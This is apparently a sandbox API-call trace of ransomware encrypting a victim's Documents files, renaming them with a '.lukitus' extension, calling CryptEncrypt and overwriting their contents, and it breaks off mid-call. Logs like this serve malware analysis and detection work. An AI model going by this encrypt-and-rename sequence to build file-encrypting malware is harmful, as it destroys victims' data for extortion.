1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.792] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\MB-yqTrORXhMOe.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\mb-yqtrorxhmoe.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.792] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\MB-yqTrORXhMOe.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\mb-yqtrorxhmoe.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-65272A78-F5925D3FA2A8.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-65272a78-f5925d3fa2a8.lukitus"), dwFlags=0x9) returned 1 [0106.795] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.795] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.800] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10c1d, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10c1d, lpOverlapped=0x0) returned 1 [0106.801] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.801] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10c1d, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10c1d, lpOverlapped=0x0) returned 1 [0106.802] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.802] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63aeb690, dwHighDateTime=0x1d31760)) [0106.802] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.802] FlushFileBuffers (hFile=0x324) returned 1 [0106.805] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\nNYiB9XHa kx1Nj0TSz.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\nnyib9xha kx1nj0tsz.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c13900, ftCreationTime.dwHighDateTime=0x1d2f60f, ftLastAccessTime.dwLowDateTime=0x5c32ccb0, ftLastAccessTime.dwHighDateTime=0x1d2f6f1, ftLastWriteTime.dwLowDateTime=0x5c32ccb0, ftLastWriteTime.dwHighDateTime=0x1d2f6f1, nFileSizeHigh=0x0, nFileSizeLow=0x13a1a)) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.805] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\nNYiB9XHa kx1Nj0TSz.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\nnyib9xha kx1nj0tsz.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.806] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\nNYiB9XHa kx1Nj0TSz.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\nnyib9xha kx1nj0tsz.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-CE32CC3F-EBE8612BBB20.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-ce32cc3f-ebe8612bbb20.lukitus"), dwFlags=0x9) returned 1 [0106.807] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.807] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.813] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x13a1a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x13a1a, lpOverlapped=0x0) returned 1 [0106.814] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.814] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x13a1a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x13a1a, lpOverlapped=0x0) returned 1 [0106.814] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.814] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63b117f0, dwHighDateTime=0x1d31760)) [0106.814] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.815] FlushFileBuffers (hFile=0x324) returned 1 [0106.817] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\numLCBTSa6GhcpDwzxf.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\numlcbtsa6ghcpdwzxf.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf86a86b0, ftCreationTime.dwHighDateTime=0x1d2d2ff, ftLastAccessTime.dwLowDateTime=0xfc71e7a0, ftLastAccessTime.dwHighDateTime=0x1d2e9c8, ftLastWriteTime.dwLowDateTime=0xfc71e7a0, ftLastWriteTime.dwHighDateTime=0x1d2e9c8, nFileSizeHigh=0x0, nFileSizeLow=0xc6a5)) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.818] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\numLCBTSa6GhcpDwzxf.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\numlcbtsa6ghcpdwzxf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.818] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\numLCBTSa6GhcpDwzxf.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\numlcbtsa6ghcpdwzxf.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-CDA913E8-271056AB5827.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-cda913e8-271056ab5827.lukitus"), dwFlags=0x9) returned 1 [0106.820] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.820] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.826] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xc6a5, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xc6a5, lpOverlapped=0x0) returned 1 [0106.827] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.827] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xc6a5, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xc6a5, lpOverlapped=0x0) returned 1 [0106.827] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.828] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63b37950, dwHighDateTime=0x1d31760)) [0106.828] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.828] FlushFileBuffers (hFile=0x324) returned 1 [0106.835] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\-v4o9DqP.odp" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\-v4o9dqp.odp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a69710, ftCreationTime.dwHighDateTime=0x1d2fc09, ftLastAccessTime.dwLowDateTime=0x64f60330, ftLastAccessTime.dwHighDateTime=0x1d2fcff, ftLastWriteTime.dwLowDateTime=0x64f60330, ftLastWriteTime.dwHighDateTime=0x1d2fcff, nFileSizeHigh=0x0, nFileSizeLow=0x158e)) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.836] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\-v4o9DqP.odp" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\-v4o9dqp.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.836] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\-v4o9DqP.odp" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\-v4o9dqp.odp"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-BA7682C3-CEEF9FBF020C.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-ba7682c3-ceef9fbf020c.lukitus"), dwFlags=0x9) returned 1 [0106.837] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.838] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.843] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x158e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x158e, lpOverlapped=0x0) returned 1 [0106.844] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.844] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x158e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x158e, lpOverlapped=0x0) returned 1 [0106.844] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63b5dab0, dwHighDateTime=0x1d31760)) [0106.844] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.845] FlushFileBuffers (hFile=0x324) returned 1 [0106.847] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\2T-3O.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\2t-3o.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd879d740, ftCreationTime.dwHighDateTime=0x1d2f7c4, ftLastAccessTime.dwLowDateTime=0x67657d30, ftLastAccessTime.dwHighDateTime=0x1d2fcaa, ftLastWriteTime.dwLowDateTime=0x67657d30, ftLastWriteTime.dwHighDateTime=0x1d2fcaa, nFileSizeHigh=0x0, nFileSizeLow=0xd613)) returned 1 [0106.847] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.848] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\2T-3O.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\2t-3o.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.848] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\2T-3O.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\2t-3o.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-FDD27FFA-D0B0AF905888.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-fdd27ffa-d0b0af905888.lukitus"), dwFlags=0x9) returned 1 [0106.850] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.850] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.855] ReadFile (in: hFile=0x324, 